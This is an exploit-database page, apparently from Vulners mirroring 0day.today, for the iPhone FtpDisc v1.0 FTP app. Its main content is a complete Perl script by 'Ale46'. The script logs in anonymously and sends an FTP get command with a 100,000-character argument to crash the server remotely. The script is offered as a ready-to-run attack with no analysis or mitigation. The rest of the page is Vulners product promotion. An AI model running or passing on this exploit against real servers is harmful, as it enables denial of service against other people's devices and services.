Lucene search
K

iPhone FtpDisc v1.0 Denial of Service

🗓️ 23 Feb 2010 00:00:00Reported by Ale46Type 
zdt
 zdt
🔗 0day.today👁 21 Views

iPhone FtpDisc v1.0 Denial of Service exploi

Code
=====================================
iPhone FtpDisc v1.0 Denial of Service
=====================================

#!/usr/bin/perl
#Title: FtpDisc for Iphone - Remote DOS Exploit
#Date: 23/02/2010
#Author: Ale46
#Software Link: http://mochasoft.dk/iphone_ftp.htm
#Version: 1.0
#Note: FtpDisc Lite has the same vuln
#Greetz: Gandalf
 
 
use Net::FTP;
 
if(@ARGV<1){
    print "[-]\t Error: ./ftpdisc <ftp_server_ip>\n";
    exit();
}
 
my $ftp;
my $host = $ARGV[0];
my $stuff;
 
for ($i=0;$i<100000;$i++){
    $stuff .="A";
}
 
 
$ftp = Net::FTP->new($host, Timeout=>24, Debug => 0)
or die "Error: [email protected]";
print "\n[-]\t Logging to FTP\n\n";
sleep(2);
$ftp->login('anonymous','[email protected]')
or die "Error: ", $ftp->message;
print "[-]\t Sending Eval Command\n\n";
sleep(2);
$ftp->get($stuff);
$ftp->quit;
print "[-]\t Uh.. A crash..\n";



#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Feb 2010 00:00Current
7High risk
Vulners AI Score7
21